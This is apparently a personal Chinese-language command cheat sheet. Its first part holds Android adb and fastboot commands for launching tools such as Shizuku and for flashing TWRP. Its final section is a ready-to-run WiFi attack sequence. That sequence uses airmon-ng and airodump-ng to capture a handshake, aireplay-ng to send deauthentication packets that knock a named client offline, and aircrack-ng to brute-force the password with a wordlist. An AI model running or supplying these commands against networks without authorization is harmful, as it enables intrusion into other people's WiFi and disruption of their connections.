Skip to content

刷机

黑域

zsh
adb -d shell sh /data/data/me.piebridge.brevent/brevent.sh

冰箱

zsh
adb shell sh /sdcard/Android/data/com.catchingnow.icebox/files/start.sh

刷入 fastboot

zsh
fastboot flash recovery twrp.img
fastboot boot twrp.img

启动 Shizuku

zsh
adb shell sh /sdcard/Android/data/moe.shizuku.privileged.api/start.sh

启动 scene

zsh
adb shell sh /data/user/0/com.omarea.vtools/files/up.sh

开两个 cmd 窗口,一个监听一个踢下线

sh
# 激活无线网卡的监听模式
airmon-ng start wlan0 

#扫描当前周边环境的WiFi信号
airodump-ng wlan0 

#抓包命令,这个窗口不要关闭
airodump-ng -c 11 –bssid 60:32:B1:56:3F:B2 -w /home/lingdu/桌面/handshake wlan0

# ACK 死亡攻击:
aireplay-ng -0 10 -a 60:32:B1:56:3F:B2 -c F0:72:EA:E8:72:21 wlan0

#10为攻击参数,10为发送次数,a为目标mac,c为源mac

#暴力破解命令:
aircrack-ng -w /root/桌面/password.txt -b 60:32:B1:56:3F:B2 /root/桌面/handshake-0*.cap